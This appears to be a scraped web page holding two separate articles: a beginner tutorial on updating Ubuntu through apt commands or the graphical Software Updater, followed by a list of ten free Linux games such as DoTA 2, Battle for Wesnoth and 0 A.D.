If you are a new user and have been using Ubuntu for a few days or weeks, you might be wondering how to update your Ubuntu system for security patches, bug fixes and application upgrades.

Updating Ubuntu is absolutely simple. I am not exaggerating. It’s as simple as running two commands. Let me give you more details on it.

Please note that the tutorial is valid for Ubuntu 18.04, 16.04 or any other version. The command line way is also valid for Ubuntu-based distributions like Linux Mint, Linux Lite, elementary OS etc.

Update Ubuntu via Command Line

How to Update Ubuntu

On the desktop, open the terminal. You can find it in the menu or use the Ctrl+Alt+T keyboard shortcut. If you are logged on to an Ubuntu server, you already have access to a terminal.

In the terminal, you just have to use the following command:

sudo apt update && sudo apt upgrade -y

It will ask for a password; you can use your account’s password. You won’t see anything on the screen while typing, so keep typing your password and hit enter.

Now let me explain the above command.

Actually, it’s not a single command. It’s a combination of two commands. The && is a way to combine two commands in a way that the second command runs only when the previous command ran successfully.

The ‘-y’ at the end automatically enters yes when the command ‘apt upgrade’ asks for your confirmation before installing the updates.

Note that you can also use the two commands separately, one by one:

sudo apt update
sudo apt upgrade

It will take a little longer because you have to wait for one command to finish and then enter the second command.

Explanation: sudo apt update

This command updates the local database of available packages. If you don’t run this command, the local database won’t be updated and your system won’t know whether newer versions are available.

This is why when you run the sudo apt update, you’ll see lots of URLs in the output. The command fetches the package information from the respective repositories (the URLs you see in the output).

Updating Ubuntu Linux

At the end of the command, it tells you how many packages can be upgraded. You can see these packages by running the following command:

apt list --upgradable

Additional Reading: Read this article to learn what is Ign, Hit and Get in the apt update command output.

Explanation: sudo apt upgrade

This command matches the versions of installed packages against the local database. It collects all of them and then lists the packages that have a newer version available. At this point, it will ask if you want to upgrade the installed packages to their newer versions.

Update Ubuntu Linux via Command Line

You can type ‘yes’, ‘y’ or just press enter to confirm the installation of updates.

So the bottom line is that sudo apt update checks for the availability of new versions, while sudo apt upgrade actually installs them.

The term update might be confusing as you might expect the apt update command to update the system by installing the updates but that doesn’t happen.

Update Ubuntu via GUI [For Desktop Users]

If you are using Ubuntu as a desktop, you don’t have to go to the terminal just to update the system. You can still use the command line, but it’s optional for you.

In the menu, look for ‘Software Updater’ and run it.

Run Software Updater in Ubuntu

It will check if there are updates available for your system.

Checking if updates are available for Ubuntu

If there are updates available, it will provide you with the option to install the updates.

Install Updates via Update Manager in Ubuntu

Click on Install Now, it may ask for your password.

Installing Updates in Ubuntu Linux via GUI

Once you enter your password, it will start installing the updates.

Updating Ubuntu via GUI

In some cases, you may need to reboot the system for the installed updates to work properly. You’ll be notified at the end of the update if you need to restart the system.

Updating Ubuntu via GUI

You can choose to restart later if you don’t want to reboot your system straightaway.

Installing updates via GUI in Ubuntu

Tip: If the software updater returns an error, you should use the command ‘sudo apt update’ in the terminal. The last few lines of the output will contain the actual error message. You can search on the internet for that error and fix the problem.

A few things to keep in mind about updating Ubuntu

You just learned how to update your Ubuntu system. If you are interested, you should also know these few things around Ubuntu updates.

Clean up after an update

Your system will have some unnecessary packages that won’t be required after the updates. You can remove such packages and free up some space using this command:

sudo apt autoremove

Live patching kernel in Ubuntu Server to avoid rebooting

In the case of a Linux kernel update, you’ll have to restart the system afterwards. This is an issue when you don’t want downtime for your server.

Live patching feature allows the patching of Linux kernel while the kernel is still running. In other words, you don’t have to reboot your system.

If you manage servers, you may want to enable live patching in Ubuntu.
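
Enabling it is typically a matter of installing the livepatch snap and registering with a token from your Ubuntu account; the token below is a placeholder:

sudo snap install canonical-livepatch
sudo canonical-livepatch enable YOUR_LIVEPATCH_TOKEN
canonical-livepatch status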

Version upgrades are different

The updates discussed here are meant to keep your Ubuntu install fresh and updated. They don’t cover version upgrades (for example upgrading Ubuntu 16.04 to 18.04).

Ubuntu version upgrades are entirely a different thing. It updates the entire operating system core. You need to make proper backups before starting this lengthy process.
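
When you are ready for a version upgrade, the usual route on both desktop and server is to fully update the current release first and then run the release upgrader:

sudo apt update && sudo apt upgrade -y
sudo do-release-upgrade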

Source

The 10 Best Free Linux Games

There are plenty of excellent games on Linux, and a fair amount of them are completely free. Some are open source, and others are fairly big names available through Steam. In every case, these are quality games that you can play any time on Linux at absolutely no cost.

DoTA 2

DoTA 2 is one of Valve’s biggest titles. It’s been around for a fairly long time, and it was one of the first games Valve ported to Linux when they started supporting the OS with Steam. It was also one of the first Linux games to receive Vulkan support.

DoTA 2 is one of the biggest MoBA games and a giant player in the eSports space. Valve continues to update DoTA 2 with new heroes and content. Because DoTA 2 is an eSports title with an active online playerbase, you’re never going to run out of things to do in this game.

Team Fortress 2

Team Fortress 2 is another major title from Valve. It’s a cartoon first person shooter that lets you take the role of one of several characters with different abilities. Together with your team, you fight an opposing team over several objectives. Team Fortress 2 might not be as big as it once was, but it’s still a very popular title with complete Linux support. With an active online community and competitive play, this one shouldn’t get old for a long time.

Wakfu

Wakfu is another excellent free game available on Steam. This is a classic anime-style turn based tactical RPG with a movement grid. Wakfu is actually a free to play MMORPG with an active and dedicated community.

If you’re a fan of classic JRPGs, or you’re just looking for something different, this one is a fantastic option. Because Wakfu is an MMO that’s still being actively supported, more content is always being added to the game, making it a great long term favorite.

Xonotic

Xonotic is one of those games that goes back a long way with Linux gamers. It’s an open source sci-fi first person shooter with a fast paced gameplay feel that might remind you of a mix between Quake and Timesplitters.

Xonotic might not be a AAA blockbuster, but it’s still a fun game with online play. Because it’s open source, you might even find it in your distribution’s repositories. Even if it’s not, you still won’t have a problem downloading it and getting it running quickly.

Battle For Wesnoth

Battle for Wesnoth is a turn based strategy game set in a medieval fantasy world. Wesnoth is open source, and it’s available in many distribution repositories as well as on Steam. This is another game that’s been synonymous with Linux gaming for a long time.

Wesnoth has an endearing old-school vibe with pixel graphics, but don’t let that trick you into thinking this is a dated game. Instead, it blends nostalgic visuals with genuinely fun and engaging gameplay to make one awesome free game.

0 A.D.

If real time strategy is more your thing, check out 0 A.D. It’s an open source real time strategy (RTS) game that’s probably available in your distribution’s repositories. 0 A.D. has been popular for a long time in the Linux world, and for good reason. It’s actually a great RTS game that can rival some commercial options.

0 A.D. is still under continual development, and receives regular updates. It features fully 3D gameplay and units with combat animations. Over the years, the graphics of 0 A.D. have improved dramatically, so it looks pretty great, especially for a free game.

SuperTuxKart

For years, SuperTuxKart was a joke of sorts when talking about Linux gaming. It’s an open source clone of the popular Mario Kart series, but featuring Tux instead of Nintendo’s trademark plumber. Still, the game is actually fun, free, and probably in your distribution’s repositories. SuperTuxKart is fully 3D and will run on nearly any Linux computer, regardless of your system specs, making it a great option for standard desktops as well as gaming PCs.

The Dark Mod

If you like the classic game Thief, check out The Dark Mod. First off, it’s not technically a mod, at least not anymore. It started out as a total conversion on top of Doom 3, but it’s since evolved into its own standalone game that you can download directly from the developer’s website.

The Dark Mod is a lot like Thief, with the player acting as a thief in a steampunk style world, but it isn’t set in the same world and doesn’t use any of the assets from Thief. This is its own game, a fan created tribute of sorts. That said, it’s still an actively developed title with regular updates, new content, and continual improvements. If you’re a fan of stealth gameplay at all, this one should be on your to-play list.

HedgeWars

HedgeWars is a modern remake of the classic game Worms, but with its own twists and improvements. Like Worms, HedgeWars is all about strategy and choosing the right tools for each situation. HedgeWars adds a more comedic style and multiplayer.

HedgeWars is open source, cross platform, and of course, free to play. It’s under constant development with new tools, weapons, and customization options always popping up.

AwesomeNauts

AwesomeNauts is another free Steam game for Linux. This one isn’t from Valve. Instead, it’s one of the growing number of indie titles to support Linux on Steam. AwesomeNauts is a 2D side scrolling MoBA that feels like a strange cross between DoTA 2 and Mega Man. Somehow, that works in a really great way.

While serious MoBA fans might not like the side scrolling gameplay, if you’re looking for something that’s just pure chaotic fun, this one is definitely a great option.

Closing Thoughts

These games are a great example of how much the Linux gaming ecosystem is growing. With top quality free games continually adding to an already impressive library, gamers will find more options than ever to get into gaming on Linux.

Source
